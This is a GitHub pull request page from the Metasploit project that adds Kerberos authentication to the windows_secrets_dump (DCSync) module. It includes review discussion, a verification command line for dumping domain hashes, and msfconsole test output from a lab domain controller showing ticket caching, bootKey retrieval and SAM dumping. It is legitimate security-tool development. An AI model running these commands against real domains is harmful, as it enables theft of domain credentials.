Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

DCSync using Kerberos #18419

Merged
merged 8 commits into from
Oct 30, 2023
Merged

DCSync using Kerberos #18419

merged 8 commits into from
Oct 30, 2023

Conversation

smashery
Copy link
Contributor

@smashery smashery commented Oct 3, 2023
edited
Loading

This PR enables the use of Kerberos authentication with the windows_secret_dump module (DCSync).

It relies on a corresponding PR in the https://github.com/rapid7/ruby_smb repository (rapid7/ruby_smb#253). Make sure you include those changes when testing.

Verification

  • Set up a domain controller (I've tested on 2022 and 2012)
  • Obtain domain admin creds
  • Start msfconsole
  • use windows_secrets_dump
  • run rhosts=<IP> smbdomain=<domain> smbuser=<admin> smb::rhostname=<hostname> domaincontrollerrhost=<ip> smbpass=<password> smb::auth=kerberos action=domain
  • Verify that stealing user hashes succeeds
  • Verify that this works using both RC4 and AES (you can test this by disabling AES in group policy, gpupdate /force, and purging the MSF kerberos ticket cache (klist -d)
  • Verify that NTLM auth still works (smb::auth=ntlm)
  • Verify that other kerberos modules still work (I've tested winrm_cmd and psexec modules)

@smashery smashery mentioned this pull request Oct 3, 2023
Merged
@smcintyre-r7 smcintyre-r7 self-assigned this Oct 3, 2023
@smcintyre-r7 smcintyre-r7 added library blocked Blocked by one or more additional tasks rn-enhancement release notes enhancement feature-kerberos-authentication Adds Kerberos Authentication support to framework labels Oct 3, 2023
smcintyre-r7
smcintyre-r7 requested changes Oct 3, 2023
View reviewed changes
lib/rex/proto/kerberos/crypto/rc4_hmac.rb Outdated Show resolved Hide resolved
lib/rex/proto/kerberos/crypto/rc4_hmac.rb Show resolved Hide resolved
lib/rex/proto/kerberos/model/enc_ap_rep_part.rb Outdated Show resolved Hide resolved
lib/rex/proto/gss/kerberos/message_encryptor.rb Outdated Show resolved Hide resolved
@smcintyre-r7 smcintyre-r7 linked an issue Oct 3, 2023 that may be closed by this pull request
Windows Secrets Dump DOMAIN action (DCSync) fails with PTT #18312
Closed
@smcintyre-r7
Copy link
Contributor

I gave this a quick test and confirmed it's working with PTT as intended now. I was able to follow the steps I outlined in my original ticket and it's working. I still need to test some other modules but over all this is looking pretty good.

cdelafuente-r7
cdelafuente-r7 reviewed Oct 17, 2023
View reviewed changes
Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @smashery, this is awesome! I tested in my environment and it works great. I just left a few comments for you to review when you get a chance.

lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb Outdated Show resolved Hide resolved
lib/msf/core/exploit/remote/kerberos/service_authenticator/base.rb Outdated Show resolved Hide resolved
lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb Outdated Show resolved Hide resolved
lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb Outdated Show resolved Hide resolved
lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb Outdated Show resolved Hide resolved
lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb Outdated Show resolved Hide resolved
lib/msf/core/exploit/remote/dcerpc/kerberos_authentication.rb
return false
end
set_decrypted_packet(dcerpc_response, result)
end
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

If I understand this correctly, self.krb_encryptor.decrypt_and_verify should only verify if the decrypted data is correct (checksum, sequence number, etc.). I believe the signature in the DCERPC response is not verified. This method is supposed to also verify the signature and return a boolean.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

decrypt_and_verify passes off to the respective Kerberos encryption routines to do the decryption+verification. These throw exceptions if it's invalid (error message will be "HMAC integrity error". So the rescue above will catch that and return false. But good catch - function needs to return true if it passes through without error.

@zeroSteiner zeroSteiner mentioned this pull request Oct 25, 2023
Merged
6 tasks
@smcintyre-r7 smcintyre-r7 removed the blocked Blocked by one or more additional tasks label Oct 30, 2023
@smcintyre-r7
Copy link
Contributor

Tested one last time and everything looks good to me now. I'll get this landed in a moment.

Testing Output 
msf6 auxiliary(gather/windows_secrets_dump) > show options 

Module options (auxiliary/gather/windows_secrets_dump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The target port (TCP)
   SMBDomain  msflab.local     no        The Windows domain to use for authentication
   SMBPass    Password1!       no        The password for the specified username
   SMBUser    smcintyre        no        The username to authenticate as


Auxiliary action:

   Name  Description
   ----  -----------
   ALL   Dump everything



View the full module info with the info, or info -d command.

msf6 auxiliary(gather/windows_secrets_dump) > set SMB::Auth kerberos 
SMB::Auth => kerberos
msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 192.168.159.10

[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGT-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGT MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20231030092950_default_192.168.159.10_mit.kerberos.cca_748861.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:445 - 192.168.159.10:445 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20231030092950_default_192.168.159.10_mit.kerberos.cca_874899.bin
[+] 192.168.159.10:445 - 192.168.159.10:88 - Received a valid delegation TGS-Response
[*] 192.168.159.10:445 - Service RemoteRegistry is in stopped state
[*] 192.168.159.10:445 - Starting service...
[*] 192.168.159.10:445 - Retrieving target system bootKey
[+] 192.168.159.10:445 - bootKey: 0x369c37bc5ec5e4b3eaeee7b69caf5d6a
[*] 192.168.159.10:445 - Saving remote SAM database
[*] 192.168.159.10:445 - Dumping SAM hashes

... redacted ...

[*] Auxiliary module execution completed
msf6 auxiliary(gather/windows_secrets_dump) > klist
Kerberos Cache
==============
id   host            principal               sname                              issued                     status  path
--   ----            ---------               -----                              ------                     ------  ----
509  192.168.159.10  [email protected]  krbtgt/[email protected]   2023-10-30 09:29:49 -0400  active  /home/smcintyre/.msf4/loot/20231030092950_default_192.168.159.10_mit.kerberos.cca_748861.bin
510  192.168.159.10  [email protected]  cifs/[email protected]  2023-10-30 09:29:49 -0400  active  /home/smcintyre/.msf4/loot/20231030092950_default_192.168.159.10_mit.kerberos.cca_874899.bin
511  192.168.159.10  [email protected]  ldap/[email protected]  2023-10-30 09:29:54 -0400  active  /home/smcintyre/.msf4/loot/20231030092954_default_192.168.159.10_mit.kerberos.cca_627683.bin

msf6 auxiliary(gather/windows_secrets_dump) > unset SMBPass
Unsetting SMBPass...
[!] Variable "SMBPass" unset - but will use a default value still. If this is not desired, set it to a new value or attempt to clear it with set --clear SMBPass
msf6 auxiliary(gather/windows_secrets_dump) > shwo o
[-] Unknown command: shwo
msf6 auxiliary(gather/windows_secrets_dump) > show options 

Module options (auxiliary/gather/windows_secrets_dump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   RHOSTS     192.168.159.10   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      445              yes       The target port (TCP)
   SMBDomain  msflab.local     no        The Windows domain to use for authentication
   SMBPass                     no        The password for the specified username
   SMBUser    smcintyre        no        The username to authenticate as


Auxiliary action:

   Name  Description
   ----  -----------
   ALL   Dump everything



View the full module info with the info, or info -d command.

msf6 auxiliary(gather/windows_secrets_dump) > run
[*] Running module against 192.168.159.10

[*] 192.168.159.10:445 - 192.168.159.10:88 - Using cached credential for cifs/[email protected] [email protected]
[*] 192.168.159.10:445 - Service RemoteRegistry is already running
[*] 192.168.159.10:445 - Retrieving target system bootKey
[+] 192.168.159.10:445 - bootKey: 0x369c37bc5ec5e4b3eaeee7b69caf5d6a
[*] 192.168.159.10:445 - Saving remote SAM database
[*] 192.168.159.10:445 - Dumping SAM hashes

... redacted ...

[*] Auxiliary module execution completed
msf6 auxiliary(gather/windows_secrets_dump) >

In this output we can see the module obtains, stores and then reuses a kerberos ticket. With a cached ticket and no password, the module now works as intended.

@smcintyre-r7 smcintyre-r7 merged commit 6e9facb into rapid7:master Oct 30, 2023
55 checks passed
@smcintyre-r7
Copy link
Contributor

Release Notes

This updates the windows_secrets_dump module's DCSync technique (the DOMAIN action) to use Kerberos tickets for authentication. Users can now use Kerberos tickets for authentication with all actions in the module.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@smcintyre-r7 smcintyre-r7 smcintyre-r7 approved these changes

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 approved these changes

Assignees

@smcintyre-r7 smcintyre-r7

Labels
feature-kerberos-authentication Adds Kerberos Authentication support to framework library rn-enhancement release notes enhancement
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

Windows Secrets Dump DOMAIN action (DCSync) fails with PTT
3 participants
@smashery @smcintyre-r7 @cdelafuente-r7